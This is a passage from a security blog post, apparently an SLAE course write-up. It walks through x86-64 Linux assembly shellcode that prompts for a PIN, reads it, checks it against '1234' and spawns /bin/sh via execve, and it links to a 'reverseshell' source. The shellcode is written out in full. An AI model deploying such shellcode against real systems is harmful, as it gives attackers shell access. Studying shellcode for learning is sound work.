	<span class="nx">xor</span> <span class="nx">rdx</span><span class="p">,</span> <span class="nx">rdx</span>
	<span class="nx">add</span> <span class="nx">rdx</span><span class="p">,</span> <span class="mh">0x6</span>

	<span class="nx">xor</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsi</span>
	<span class="nx">push</span> <span class="nx">rsi</span>
	<span class="nx">mov</span> <span class="nx">rsi</span><span class="p">,</span> <span class="mh">0x3a4e4950</span>
	<span class="nx">push</span> <span class="nx">rsi</span>
	<span class="nx">mov</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsp</span>

	<span class="nx">mov</span> <span class="nx">rax</span><span class="p">,</span> <span class="mh">0x1</span>
	<span class="nx">syscall</span>
</code></pre></div></div><p>In order to receive the PIN code from the user, we can use the <code class="highlighter-rouge">read()</code> syscall. To store the 4 digit PIN code we expect from the user, we need to allocate space for a 4 byte (<code class="highlighter-rouge">sub rsp, 4</code>) long buffer. The 2nd argument of <code class="highlighter-rouge">read()</code> syscall requires us to specify the buffer’s start address which we can do by moving the current value of RSP to RSI. Fir 3rd argument, we add the value 4 to RDX, as we expect 4 bytes of data from the user and nothing more.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">;</span><span class="nl">read</span><span class="p">:</span>
	<span class="p">;</span><span class="nx">ssize_t</span> <span class="nx">read</span><span class="p">(</span><span class="kr">int</span> <span class="nx">fd</span><span class="p">,</span> <span class="k">void</span> <span class="o">*</span><span class="nx">buf</span><span class="p">,</span> <span class="nx">size_t</span> <span class="nx">count</span><span class="p">);</span>
	<span class="nx">sub</span> <span class="nx">rsp</span><span class="p">,</span> <span class="mi">4</span>
	<span class="nx">mov</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsp</span>

	<span class="nx">xor</span> <span class="nx">rdx</span><span class="p">,</span> <span class="nx">rdx</span>
	<span class="nx">add</span> <span class="nx">rdx</span><span class="p">,</span> <span class="mh">0x4</span>

	<span class="nx">xor</span> <span class="nx">rax</span><span class="p">,</span> <span class="nx">rax</span>
	<span class="nx">syscall</span>
</code></pre></div></div><p>We have received the PIN code, so now we need to decide whether to exit the program or launch a shell. For that we can compare the user input byte by byte against predetermined values 0x31 - 1, 0x32 - 2, 0x33 - 3, 0x34 - 4. If all 4 digits match, we make a jump to execve (je execve). If that is not true, we just continue the execution flow to go through with the <code class="highlighter-rouge">exit(0)</code> syscall to terminate the program.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">cmpinput</span><span class="p">:</span>
	<span class="nx">xor</span> <span class="nx">rbx</span><span class="p">,</span> <span class="nx">rbx</span>
	<span class="nx">mov</span> <span class="nx">bl</span><span class="p">,</span> <span class="kr">byte</span> <span class="p">[</span><span class="nx">rsp</span><span class="p">]</span>
	<span class="nx">xor</span> <span class="nx">rcx</span><span class="p">,</span> <span class="nx">rcx</span>
	<span class="nx">mov</span> <span class="nx">rcx</span><span class="p">,</span> <span class="mh">0x31</span>
	<span class="nx">cmp</span> <span class="nx">rbx</span><span class="p">,</span> <span class="nx">rcx</span>
	<span class="nx">jne</span> <span class="nx">exit</span>

	<span class="nx">mov</span> <span class="nx">bl</span><span class="p">,</span> <span class="kr">byte</span> <span class="p">[</span><span class="nx">rsp</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span>
	<span class="nx">mov</span> <span class="nx">rcx</span><span class="p">,</span> <span class="mh">0x32</span>
	<span class="nx">cmp</span> <span class="nx">rbx</span><span class="p">,</span> <span class="nx">rcx</span>
	<span class="nx">jne</span> <span class="nx">exit</span>

	<span class="nx">mov</span> <span class="nx">bl</span><span class="p">,</span> <span class="kr">byte</span> <span class="p">[</span><span class="nx">rsp</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span>
	<span class="nx">mov</span> <span class="nx">rcx</span><span class="p">,</span> <span class="mh">0x33</span>
        <span class="nx">cmp</span> <span class="nx">rbx</span><span class="p">,</span> <span class="nx">rcx</span>
        <span class="nx">jne</span> <span class="nx">exit</span>

	<span class="nx">mov</span> <span class="nx">bl</span><span class="p">,</span> <span class="kr">byte</span> <span class="p">[</span><span class="nx">rsp</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span>
	<span class="nx">mov</span> <span class="nx">rcx</span><span class="p">,</span> <span class="mh">0x34</span>
        <span class="nx">cmp</span> <span class="nx">rbx</span><span class="p">,</span> <span class="nx">rcx</span>
        <span class="nx">je</span> <span class="nx">execve</span>

<span class="nx">exit</span><span class="p">:</span>
        <span class="nx">xor</span> <span class="nx">rdi</span><span class="p">,</span> <span class="nx">rdi</span>
        <span class="nx">xor</span> <span class="nx">rax</span><span class="p">,</span> <span class="nx">rax</span>
        <span class="nx">add</span> <span class="nx">rax</span><span class="p">,</span> <span class="mi">60</span>
        <span class="nx">syscall</span>
</code></pre></div></div><h4 id="part-3---execute-shell-via-execve"><b>Part 3</b> - execute shell via execve()</h4><p>Let’s assume that the user has entered the correct PIN code and we have reached to the point where we need to execute the shell. <code class="highlighter-rouge">execve()</code> takes 3 arguments: the file we want to execute which for us is the <code class="highlighter-rouge">/bin/sh</code>, as we it is a pointer <code class="highlighter-rouge">const char *filename</code> we need RDI to contain the address on which we have stored the program name. This is the reason why we first move the string in hex to RBX, push on the top of the stack and then move the address to RDI.<p>Next we need to get the address of an array of string constants <code class="highlighter-rouge">{"/bin/sh", NULL};</code> to RSI. For that we can just push the address we have at RDI to the top of the stack and move that stack address to RSI.<p>Third, we do not want to pass any environment variables, so we can make the 3rd argument just 0. So to finish it up, let’s check the <code class="highlighter-rouge">execve()</code> syscall number via <code class="highlighter-rouge">ausyscall execve</code>, read it to RAX and have a go on the last syscall for this task.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">execve</span><span class="p">:</span>
	<span class="p">;</span><span class="kr">int</span> <span class="nx">execve</span><span class="p">(</span><span class="kd">const</span> <span class="kr">char</span> <span class="o">*</span><span class="nx">filename</span><span class="p">,</span> <span class="kr">char</span> <span class="o">*</span><span class="kd">const</span> <span class="nx">argv</span><span class="p">[],</span> <span class="kr">char</span> <span class="o">*</span><span class="kd">const</span> <span class="nx">envp</span><span class="p">[]);</span>
	<span class="nx">xor</span> <span class="nx">rdi</span><span class="p">,</span> <span class="nx">rdi</span>
	<span class="nx">xor</span> <span class="nx">rax</span><span class="p">,</span><span class="nx">rax</span>
	<span class="nx">push</span> <span class="nx">rax</span>

	<span class="nx">mov</span> <span class="nx">rbx</span><span class="p">,</span> <span class="mh">0x68732f6e69622f</span>
	<span class="nx">push</span> <span class="nx">rbx</span>
	<span class="nx">mov</span> <span class="nx">rdi</span><span class="p">,</span> <span class="nx">rsp</span>

	<span class="nx">push</span> <span class="nx">rax</span>
	<span class="nx">mov</span> <span class="nx">rdx</span><span class="p">,</span> <span class="nx">rsp</span>

	<span class="nx">push</span> <span class="nx">rdi</span>
	<span class="nx">mov</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsp</span>

	<span class="nx">add</span> <span class="nx">rax</span><span class="p">,</span> <span class="mi">59</span>
	<span class="nx">syscall</span>
</code></pre></div></div><p>There you have it! &lt;3<hr /><ul><li>Full assembly code can be found at:<br /> <a href="https://github.com/silviavali/SLAE/blob/master/task2/reverseshell.nasm">https://github.com/silviavali/SLAE/blob/master/task2/reverseshell.nasm</a><li>Full C code:<br /> <a href="https://github.com/silviavali/SLAE/blob/master/task2/reverseshell.c">https://github.com/silviavali/SLAE/blob/master/task2/reverseshell.c</a></ul></article><hr class="dingbat related" /><aside class="about related mt4 mb4" role="complementary"><div class="author mt4"> <hy-img src="https://placehold.it/128x128" class="avatar" alt="Silvia Väli" srcset="https://placehold.it/128x128 1x,https://placehold.it/256x256 2x" root-margin="512px" > <noscript><img data-ignore src="https://placehold.it/128x128" class="avatar" alt="Silvia Väli" srcset="https://placehold.it/128x128 1x,https://placehold.it/256x256 2x" /></noscript> <span class="loading" slot="loading" hidden> <span class="icon-cog"></span> </span> </hy-img><h2 class="page-title hr"> About</h2><p>My name is Silvia. This blog just contains various things that interest me, but probably relatively more assembly stuff. I count myself quite new to the ITsec community as I am almost 2 years in. If you wonder where I am from - Estonia.<div class="sidebar-social"> <span class="sr-only">Social:</span><ul><li> <a href="https://twitter.com/silviavaliSV" title="Twitter" class="no-mark-external"> <span class="icon-twitter"></span> <span class="sr-only">Twitter</span> </a><li> <a href="https://github.com/silviavali" title="GitHub" class="no-mark-external"> <span class="icon-github"></span> <span class="sr-only">GitHub</span> </a></ul></div></div></aside><aside class="related mb4" role="complementary"><h2 class="hr">Related Posts</h2><ul class="related-posts"><li> <a href="/blog/2019-02-25-blog-SLAE4/" class="h4 flip-title"> <span>Writing a 64-bit custom encoder</span> </a> <time class="heading faded fine" datetime="2019-02-25T00:00:00+02:00">25 Feb 2019</time><li> <a href="/blog/2019-02-25-blog-SLAE3/" class="h4 flip-title"> <span>Egghunter (64-bit Linux) using access() syscall</span> </a> <time class="heading faded fine" datetime="2019-02-25T00:00:00+02:00">25 Feb 2019</time><li> <a href="/blog/2019-01-15-blog-SLAE1/" class="h4 flip-title"> <span>64-bit bindshell with a passphrase protection</span> </a> <time class="heading faded fine" datetime="2019-01-15T00:00:00+02:00">15 Jan 2019</time></ul></aside><footer role="contentinfo"><hr/><p><small class="copyright">© 2019. All rights reserved. </small><p><small>Powered by <a class="external" href="https://hydejack.com/">Hydejack</a> v<span id="_version">8.1.1</span></small><hr class="sr-only"/></footer></main><hy-drawer class="" align="left" threshold="10" touch-events prevent-default ><header id="_sidebar" class="sidebar" role="banner"><div class="sidebar-bg sidebar-overlay" style="background-color:rgb(25,55,71);background-image:url(/assets/img/sidebar-bg.jpg)"></div><div class="sidebar-sticky"><div class="sidebar-about"> <a class="no-hover" href="/" tabindex="-1"> <img src="/assets/img/profile.jpg" class="avatar" alt="Silvia's blog" data-ignore /> </a><h2 class="h1"><a href="/">Silvia's blog</a></h2><p class=""> Random notes or stuff I am curious about.</div><nav class="sidebar-nav heading" role="navigation"> <span class="sr-only">Navigation:</span><ul><li> <a id="_navigation" href="/blog/" class="sidebar-nav-item active" > Blog </a><li> <a href="/about/" class="sidebar-nav-item" > About </a></ul></nav><div class="sidebar-social"> <span class="sr-only">Social:</span><ul><li> <a href="https://twitter.com/silviavaliSV" title="Twitter" class="no-mark-external"> <span class="icon-twitter"></span> <span class="sr-only">Twitter</span> </a><li> <a href="https://github.com/silviavali" title="GitHub" class="no-mark-external"> <span class="icon-github"></span> <span class="sr-only">GitHub</span> </a></ul></div></div></header></hy-drawer><hr class="sr-only" hidden /> </hy-push-state> <!--[if !IE]><!----> <script>loadJSDeferred(document.getElementById('_hrefJS').href);</script> <!--<![endif]--> <script> if ('serviceWorker' in navigator) { navigator.serviceWorker.getRegistration() .then(r => r.unregister()) .catch(() => {}); } </script><h2 class="sr-only" hidden>Templates (for web app):</h2><template id="_animation-template" hidden><div class="animation-main fixed-top"><div class="content"><div class="page"></div></div></div></template> <template id="_loading-template" hidden><div class="loading nav-btn fr"> <span class="sr-only">Loading…</span> <span class="icon-cog"></span></div></template> <template id="_error-template" hidden><div class="page"><h1 class="page-title">Error</h1><p class="lead"> Sorry, an error occurred while loading <a class="this-link" href=""></a>.</div></template> <template id="_back-template" hidden> <a id="_back" class="back nav-btn fl no-hover"> <span class="sr-only">Back</span> <span class="icon-arrow-left2"></span> </a> </template> <template id="_permalink-template" hidden> <a href="#" class="permalink"> <span class="sr-only">Permalink</span> <span class="icon-link"></span> </a> </template></html>
